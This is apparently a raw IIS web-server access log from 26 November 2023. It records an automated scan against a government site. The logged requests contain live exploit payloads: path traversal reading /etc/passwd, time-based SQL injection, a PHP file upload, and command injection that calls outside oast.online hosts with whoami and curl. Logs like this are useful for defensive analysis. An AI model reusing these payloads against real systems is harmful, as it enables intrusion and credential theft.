Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 71 2023-11-26 08:03:18 103.153.214.94 GET /index.php/user/ - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 65 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 08:23:27 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 08:23:27 103.153.214.94 GET /wp-admin/admin-ajax.php action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ== 443 - 173.239.196.195 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 64 2023-11-26 08:30:57 103.153.214.94 GET /logs/downloadMainLog fname=../../../../../../..//etc/passwd 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 68 2023-11-26 08:30:58 103.153.214.94 GET /logs/downloadMainLog fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 64 2023-11-26 08:39:30 103.153.214.94 GET /wp-admin/admin-ajax.php action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 64 2023-11-26 08:45:55 103.153.214.94 POST /network_test.php - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 65 2023-11-26 08:48:42 103.153.214.94 POST /task/loginValidation.php - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 65 2023-11-26 08:56:23 103.153.214.94 POST /wp-admin/admin-ajax.php action=joomsport_md_load 443 - 173.239.196.194 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 64 2023-11-26 08:59:01 103.153.214.94 GET /wp-content/plugins/usc-e-shop/functions/progress-check.php progressfile=../../../../../../../../../../../../../etc/passwd 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 68 2023-11-26 09:11:16 103.153.214.94 GET /index.asp - 443 - 173.239.196.193 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 107 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 09:36:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 09:36:13 103.153.214.94 POST /wp-admin/admin-ajax.php action=iws_gff_fetch_states 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 364 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 10:02:15 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 10:02:14 103.153.214.94 GET / - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 http://bcvt.kontum.gov.vn/ 200 0 0 591 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 10:40:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 10:40:47 103.153.214.94 GET /banker/index.php - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 http://bcvt.kontum.gov.vn/banker/index.php 200 0 0 314 2023-11-26 10:47:27 103.153.214.94 GET /api/v2/cmdb/system/admin - 443 - 173.239.196.197 Node.js - 404 0 2 2795 2023-11-26 10:47:28 103.153.214.94 PUT /api/v2/cmdb/system/admin/admin - 443 - 173.239.196.196 Report+Runner - 404 0 2 68 2023-11-26 10:49:57 103.153.214.94 GET /accounts/login/ - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 http://bcvt.kontum.gov.vn/accounts/login/ 200 0 0 153 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 11:12:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 11:12:38 103.153.214.94 GET /api/scrape/kube-system - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 2766 2023-11-26 11:13:31 103.153.214.94 POST /wp-admin/admin-ajax.php action=get_tag_fonts 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 72 2023-11-26 11:19:34 103.153.214.94 POST /login/index.php login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.clf0mb8n3tct4nj5icfgjrxp8ixzycj8y.oast.online) 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 68 2023-11-26 11:32:03 103.153.214.94 GET /admin/login/index.php - 443 - 173.239.196.194 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 301 0 0 211 2023-11-26 11:38:00 103.153.214.94 GET /wp-admin/admin-ajax.php action=loginas_return_admin 443 - 173.239.196.195 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 70 2023-11-26 11:38:00 103.153.214.94 GET /wp-admin/users.php - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 73 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 11:59:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 11:59:26 103.153.214.94 GET /wp-admin/admin-ajax.php action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 382 2023-11-26 11:59:27 103.153.214.94 GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 67 2023-11-26 12:06:00 103.153.214.94 GET / - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-26 12:06:00 103.153.214.94 GET /cgi-bin/popen.cgi command=cat%20/etc/passwd&v=0.1303033443137912 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 64 2023-11-26 12:06:02 103.153.214.94 GET / - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 63 2023-11-26 12:06:02 103.153.214.94 GET /cgi-bin/popen.cgi command=type%20C://Windows/win.ini&v=0.1303033443137912 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 62 2023-11-26 12:08:23 103.153.214.94 POST /wp-admin/admin-ajax.php action=cfom_upload_file&name=2YXBUB4M1l3ul1qs5tX8mydwOPl.pHp 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 71 2023-11-26 12:08:25 103.153.214.94 GET /wp-content/uploads/cfom_files/2yxbub4m1l3ul1qs5tx8mydwopl.php - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 65 2023-11-26 12:12:46 103.153.214.94 GET /wp-json/lp/v1/courses/archive-course template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 71 2023-11-26 12:18:11 103.153.214.94 POST /SamlResponseServlet - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 66 2023-11-26 12:19:11 103.153.214.94 GET / - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 67 2023-11-26 12:20:41 103.153.214.94 GET / - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 75 2023-11-26 12:32:18 103.153.214.94 POST /aspera/faspex/package_relay/relay_package - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 66 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 12:48:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 12:48:04 103.153.214.94 POST /banker/index.php - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 66 2023-11-26 12:52:25 103.153.214.94 POST /service/extension/backup/mboximport account-name=admin&account-status=1&ow=cmd 443 - 173.239.196.194 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 65 2023-11-26 12:52:26 103.153.214.94 GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 64 2023-11-26 12:52:37 103.153.214.94 POST /servlets/OmaDsServlet - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 163 2023-11-26 13:04:38 103.153.214.94 GET /accounts/login/ - 443 - 173.239.196.194 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 64 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 13:24:22 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 13:24:22 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 68 2023-11-26 13:30:07 103.153.214.94 POST /classes/Login.php f=login 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 64 2023-11-26 13:30:08 103.153.214.94 GET /admin/ - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 14:06:15 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 14:06:15 103.153.214.94 GET / lang=../../thinkphp/base 443 - 173.239.196.198 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 625 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 14:23:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 14:23:10 103.153.214.94 GET /flash/addcrypted2 - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 69 2023-11-26 14:23:11 103.153.214.94 POST /flash/addcrypted2 - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 67 2023-11-26 14:37:08 103.153.214.94 POST /jeecg-boot/jmreport/qurestSql - 443 - 173.239.196.197 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 65 2023-11-26 14:45:35 103.153.214.94 POST /index.php c=blocked&action=continue 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 66 2023-11-26 14:56:58 103.153.214.94 POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 66 2023-11-26 14:59:12 103.153.214.94 GET /fp-content/ - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 70 2023-11-26 14:59:14 103.153.214.94 GET /flatpress/fp-content/ - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 63 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 15:17:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 15:17:17 103.153.214.94 GET / wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId=363853%27,sleep(6),0,0,0,0,0);--+- 443 - 173.239.196.192 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 79 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 15:36:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 15:36:49 103.153.214.94 GET / - 443 - 173.239.196.197 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 72 2023-11-26 15:39:41 103.153.214.94 GET /setup/setupadministrator-start.action - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 http://bcvt.kontum.gov.vn/setup/setupadministrator-start.action 200 0 0 69 2023-11-26 15:39:44 103.153.214.94 GET /server-info.action bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2YXBTyRIH0SiVZDvBtzENUKgtkE&bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2YXBTyRIH0SiVZDvBtzENUKgtkE 443 - 173.239.196.198 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 http://bcvt.kontum.gov.vn/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2YXBTyRIH0SiVZDvBtzENUKgtkE 200 0 0 63 2023-11-26 15:39:46 103.153.214.94 GET /setup/setupadministrator-start.action - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 http://bcvt.kontum.gov.vn/setup/setupadministrator-start.action 200 0 0 63 2023-11-26 15:39:47 103.153.214.94 GET /setup/setupadministrator.action - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 http://bcvt.kontum.gov.vn/setup/setupadministrator.action 200 0 0 62 2023-11-26 15:39:48 103.153.214.94 GET /dologin.action - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 http://bcvt.kontum.gov.vn/dologin.action 200 0 0 62 2023-11-26 15:39:50 103.153.214.94 GET /welcome.action - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 http://bcvt.kontum.gov.vn/welcome.action 200 0 0 62 2023-11-26 15:48:13 103.153.214.94 POST /%77eb%75i_%77sma_Http - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 11 0 72 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 16:07:29 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 16:07:29 103.153.214.94 GET /csrf - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 67 2023-11-26 16:09:24 103.153.214.94 POST /saas./resttosaasservlet - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 67 2023-11-26 16:13:33 103.153.214.94 POST /kubepi/api/v1/users - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 68 2023-11-26 16:16:57 103.153.214.94 GET /admin/suppliers/view_details.php id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 301 0 0 203 2023-11-26 16:25:57 103.153.214.94 GET /api/v1/clusters/kubeconfig/k8s - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 2 2410 2023-11-26 16:30:25 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 70 2023-11-26 16:30:25 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 64 2023-11-26 16:30:44 103.153.214.94 GET /index.html - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 64 2023-11-26 16:30:45 103.153.214.94 POST /api/operations/ciscosb-file:form-file-upload - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 400 0 0 105 2023-11-26 16:30:45 103.153.214.94 GET /index.html - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 60 2023-11-26 16:42:15 103.153.214.94 POST /json/setup-restore.action - 443 - 173.239.196.197 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 87 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 17:01:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 17:01:39 103.153.214.94 GET / - 443 - 52.39.170.242 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 200 0 0 226 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 18:00:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 18:00:23 103.153.214.94 GET / url=<img/src="http://clf0mb8n3tct4nj5icfgytt187peh1oa6.oast.online"> 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 594 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 18:16:41 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 18:16:41 103.153.214.94 POST /ajax/api/user/save - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 71 2023-11-26 18:22:48 103.153.214.94 GET /app service=page/SetupCompleted&service=page/SetupCompleted 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 http://bcvt.kontum.gov.vn/app?service=page/SetupCompleted 200 0 0 64 2023-11-26 18:22:50 103.153.214.94 GET /app - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 http://bcvt.kontum.gov.vn/app 200 0 0 75 2023-11-26 18:22:52 103.153.214.94 GET /app - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 http://bcvt.kontum.gov.vn/app 200 0 0 62 2023-11-26 18:22:53 103.153.214.94 GET /app - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 http://bcvt.kontum.gov.vn/app 200 0 0 63 2023-11-26 18:22:53 103.153.214.94 GET /app - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 http://bcvt.kontum.gov.vn/app 200 0 0 62 2023-11-26 18:22:55 103.153.214.94 GET /app - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 http://bcvt.kontum.gov.vn/app 200 0 0 61 2023-11-26 18:22:56 103.153.214.94 GET /app service=page/PrinterList&service=page/PrinterList 443 - 173.239.196.194 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F http://bcvt.kontum.gov.vn/app?service=page/PrinterList 200 0 0 61 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 18:53:56 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 18:53:56 103.153.214.94 GET /forms/doLogin login_username=admin&password=password$(curl%20clf0mb8n3tct4nj5icfgbkagb16zydnxb.oast.online)&x=0&y=0 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 557 2023-11-26 18:57:46 103.153.214.94 GET /geoserver/ows service=WFS&version=1.0.0&request=GetCapabilities 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 67 2023-11-26 19:04:10 103.153.214.94 GET /session/login - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 67 2023-11-26 19:16:54 103.153.214.94 GET /downloader.php file=%3Becho+CVE-2023-23333|rev%00.zip 443 - 173.239.196.195 